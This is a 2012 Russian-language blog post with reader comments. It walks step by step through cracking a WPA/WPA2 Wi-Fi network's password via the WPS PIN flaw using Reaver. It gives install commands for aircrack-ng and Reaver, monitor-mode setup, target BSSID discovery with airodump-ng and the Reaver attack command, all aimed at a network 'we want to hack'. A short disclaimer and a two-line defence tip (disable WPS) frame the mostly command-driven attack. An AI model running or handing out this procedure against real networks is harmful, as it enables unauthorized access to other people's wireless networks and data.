WPA/WPA2 Взлом =)

Asset Mamyraimov March 5, 2012
49910
26
2
0

Способы защиты и взлома WPA/WPA2 ключей Wi-Fi

Рассмотрим пошагово, как с помощью Reaver взломать пароль WPA или WPA2.

Во-первых, краткое замечание, знание – это сила, но сила не означает, что Вы должны что-то сломать, или делать что-то незаконное. Знание, как взломать замок, не делают Вас вором. Рассматриваем данную статью как образовательную или доказательство правильности концепции интеллектуального права. Чем больше Вы знаете, тем лучше сможете защитить себя.

Начнем с того что нужно для взлома.

1) Любой дистрибутив Линукса, лично у меня стоит Ubuntu 10.10

2) aircrack-ng 1.1

3) Ну и Reaver

1) Установка Ubuntu 10.10

2) Установка aircrack-ng 1.1

Открываем Терминал Ctrl+Alt+T и прописываем

 
sudo apt-get install build-essential
 

sudo дает права админа, и при просьбе ввести пароль надо ввести тот пароль, который вы используете для входа в учетную запись. P.S. Он не будет отображать как вводится пароль. Качаем aircrack

 
wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
 

Разархивируем

 
tar -zxvf aircrack-ng-1.1.tar.gz
 

Переходим в папку

 
cd aircrack-ng-1.1
 

Устанавливаем... Сперва

 
 make 
 

и ждем пока от компилируется, затем устанавливаем

 
 make install
 

Ну вот мы и установили aircrack. =)

3) Установка Reaver

Качаем Reaver

 
wget http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz
 

Распаковываем

 
tar -xzvf reaver-1.3.tar.gz
 

Но перед установкой мы должны скачать пару библиотек

 
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev 
 

После того как скачали, переходим в папку с исходниками

 
cd reaver-1.3/src
 

Конфигурируем...

 
./configure
 

Компилируем...

 
sudo make
 

И устанавливаем

 
sudo make install
 

4) Соберем информацию об устройстве

Для того, чтобы использовать Reaver, Вам необходимо получить имя интерфейса беспроводной карты, BSSID маршрутизатора, который Вы пытаетесь сломать (BSSID – это уникальная последовательность букв и цифр, который идентифицирует маршрутизатор), и Вы должны убедиться, что Ваша карта беспроводной сети находится в режиме мониторинга. Давайте все это сделаем. Найдите Вашу беспроводную карту: Внутри Terminal, введите:

 
iwconfig
 

Нажмите клавишу Enter. Вы должны увидеть мобильное устройство в списке. Скорее всего, это будет имя wlan0, но если у Вас есть несколько беспроводных карт или необычные сетевые настройки, то название может быть другое. Переведите Вашу беспроводную карту в режим мониторинга:
Предположим, что имя интерфейса Вашей беспроводной карты есть wlan0, тогда выполните следующую команду, чтобы перевести беспроводную карту в режим мониторинга:

 
sudo airmon-ng start wlan0
 

Эта команда выведет имя интерфейса режима мониторинга, которое Вы также должны знать. Скорее всего, это будет mon0, как показано на рисунке ниже. Обратите на это внимание.

Найдите BSSID маршрутизатора, который Вы хотите взломать: Наконец, Вам необходимо получить уникальный идентификатор маршрутизатора, который Вы пытаетесь взломать, чтобы Вы могли указать Reaver правильное направление. Для этого выполните следующую команду:

 
sudo airodump-ng mon0
 

Вы увидите список беспроводных сетей вокруг Вас – это выглядит как на скриншоте ниже:
Когда увидите необходимую сеть – нажмите Ctrl + C, чтобы остановить обновление списка и скопируйте BSSID данной сети (это последовательность букв, цифр и двоеточий в крайнем левом столбце). Сеть должны иметь WPA или WPA2, перечисленные в колонке ENC. Теперь, с BSSID и именем интерфейса монитора в руках у Вас есть все необходимое для запуска Reaver. P.S. 4 пункт был взят ТУТ

Ну и сам процесс Взлома =)

Скопируем BSSID того кого хотим взломать. Заменяем bssid на BSSID того кого хотим взломать

 
reaver -i mon0 -b bssid -vv
 

Должно получиться что то типа этого

 
reaver -i mon0 -b 0C:EE:E6:AE:BB:1E -vv
 

Нажимаем Enter, и идем гулять, спать, смотреть фильм, одним словом ждем когда Reaver закончить свою работу. Документация Reaver утверждает, что это может занять от 4 до 10 часов, лично у меня процесс взлома занял около 4 часов =)))

В течение всего процесса Reaver иногда делает тайм-аут, иногда зацикливается, проверяя PIN-код повторно Когда Reaver завершит взлом, то это будет выглядеть следующим образом:

Как работает Reaver

Теперь, когда Вы увидели, как использовать Reaver, давайте сделаем краткий обзор того, что делает Reaver. Инструмент использует уязвимость под названием Wi-Fi Protected Setup, или WPS. Это функция, которая существует на многих маршрутизаторах, предназначенная для обеспечения простого процесса установки и жестко связана с PIN устройства. Reaver эксплуатирует недостаток в этих PIN-кодах: результатом является то, что за достаточное время, он может раскрыть свой WPA-или WPA2-пароль

Ну и на последок как защитить себя от атак Reaver

Поскольку уязвимость заключается в реализации WPS, то Ваша сеть должна быть безопасной, если можно просто выключить WPS (или, еще лучше, если Ваш маршрутизатор не поддерживает WPS). Кроме того, можно настроить фильтрацию MAC-адреса маршрутизатора.

 

Оцените пост

1

Комментарии

0
ай да пост, Аська.
0
пост хороший это из последнего "Хакера "? у них вроде была подобная статья...
0
Да нет =))) написано мною, ну кроме 4 части)))
0
Почему-то не компилирует.
Может потому что Убунту 12.04??? Или 64 бита???
0
Перед make пиши всегда sudo =)
Показать комментарии